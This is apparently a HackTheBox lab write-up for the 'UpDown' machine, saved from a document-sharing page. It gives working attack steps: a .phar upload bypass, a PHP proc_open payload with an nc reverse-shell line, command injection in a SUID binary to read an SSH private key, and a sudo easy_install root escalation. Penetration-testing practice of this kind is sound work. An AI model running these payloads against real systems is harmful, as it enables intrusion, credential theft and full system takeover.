Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Up Down

Download as pdf or txt
Download as pdf or txt
You are on page 1of 5

UpDown

Sunday, September 4, 2022 2:42 PM

IP:10.129.111.50
THM{THREAT_BLOCKED}
Enumeration

nmap -vv --min-rate=1000 -T4 10.129.111.50 | grep '^[0-9]'|cut -d '/' -f 1|tr '\n' ','|sed s/,$//
nmap -vv -p22,80 -T4 -sCV -o nmap.txt 10.129.111.50

PORT STATE SERVICE REASON VERSION


22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABgQDl7j17X/EWcm1MwzD7sKOFZyTUggWH1RRgwFbAK+B6R28x47OJjQW8VO4tCjTyvqKBzpgg7r98xNEykmvnMr0V9e
Uhg6zf04GfS/gudDF3Fbr3XnZOsrMmryChQdkMyZQK1HULbqRij1tdHaxbIGbG5CmIxbh69mMwBOlinQINCStytTvZq4btP5xSMd8pyzuZdqw3Z58ORSnJAorhBXAmV
a9126OoLx7AzL0aO3lqgWjo/wwd3FmcYxAdOjKFbIRiZK/f7RJHty9P2WhhmZ6mZBSTAvIJ36Kb4Z0NuZ+ztfZCCDEw3z3bVXSVR/cp0Z0186gkZv8w8cp/ZHbtJB/nofz
EBEeIK8gZqeFc/hwrySA6yBbSg0FYmXSvUuKgtjTgbZvgog66h+
98XUgXheX1YPDcnUU66zcZbGsSM1aw1sMqB1vHhd2LGeY8UeQ1pr+lppDwMgce8DO141tj+ozjJouy19Tkc9BB46FNJ43Jl58CbLPdHUcWeMbjwauMrw0=
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKMJ3/md06ho+
1RKACqh2T8urLkt1ST6yJ9EXEkuJh0UI/zFcIffzUOeiD2ZHphWyvRDIqm7ikVvNFmigSBUpXI=
| 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL1VZrZbtNuK2LKeBBzfz0gywG4oYxgPl+s5QENjani1
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

First find the git repo on the webapp and the vhost.

Domain: siteisup.htb dev.siteisup.htb add to /etc/hosts


wfuzz -v -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://siteisup.htb/ -H "Host:FUZZ.siteisup.htb"

dirsearch -u http://siteisup.htb/

┌──(loc㉿kali)-[~/HackTheBox/UpDown]
└─$ dirsearch -u http://siteisup.htb/
#########################
[06:26:02] 301 - 310B - /dev -> http://siteisup.htb/dev/
########################

dirsearch -u http://siteisup.htb/dev/ [06:25:50] 301 - 315B - /dev/.git -> http://siteisup.htb/dev/.git/

Dump the git repo using something like git-dumper.

~/Tool/GitHub/git-dumper/git_dumper.py http://siteisup.htb/dev repo

On the source code of git repo, check the checker.php file, you will see that you are able to upload files and .phar is not included in the upload filter.

Also from .htaccess, you will see that you need a header like this to access the dev.siteisup.htb (You can use burp and just create a rule):
code Special-Dev: only4dev

Create a rule Burp Suite

Projection opiton -> Session Handling Rules


So create a .phar file, and put like 200 to 300 lines of random url to gain some time, because after it checks the urls file gets deleted.

Generate random URLs (randomlists.com)

Using this you are able to run some commands, but there are some disabled functions that prevents us from running system commands.
You can use file_put_contents to put <?php phpinfo(); ?> to a php file on wepapp and see what those functions are.

proc_open function is not one of those disabled functions so after the urls put this by modifying the ip and port and upload the phar file:

code <?php
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("sh", $descriptorspec, $pipes);
if (is_resource($process)) {
// $pipes now looks like this:
// 0 => writeable handle connected to child stdin
// 1 => readable handle connected to child stdout
// Any error output will be appended to /tmp/error-output.txt

fwrite($pipes[0], "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/f");


fclose($pipes[0]);

while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
// It is important that you close any pipes before calling
// proc_close in order to avoid a deadlock
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>

Foothold

And then you can just make a get request to the phar file with a command like this without to much bother:

code curl -H 'Special-Dev: only4dev' -s http://dev.siteisup.htb/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 >
folder-names; while read -r line; do curl -v -H 'Special-Dev: only4dev' "http://dev.siteisup.htb/uploads/
${line}<PHAR-FILE-NAME>.phar"; done < folder-names

You should be able to get a shell with this.

USER

From www-data to developer:


The /home/developer/dev/siteisup binary has suid bit set for developer user.

Running strings or just running it, it is clear that it just runs the python script with suid privileges.

We can inject commands and get the user's ssh key by simply inputting something like:

code __import__('os').system('cat /home/developer/.ssh/id_rsa')

chmod 600 developer_id_rsa ssh developer@siteisup.htb -i developer_id_rsa


ROOT

After logging in with the ssh key you got, checking sudo you will see this:

You can get root by running these commands from easy_install | GTFOBins

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF

Endgame 04/09/2022

You might also like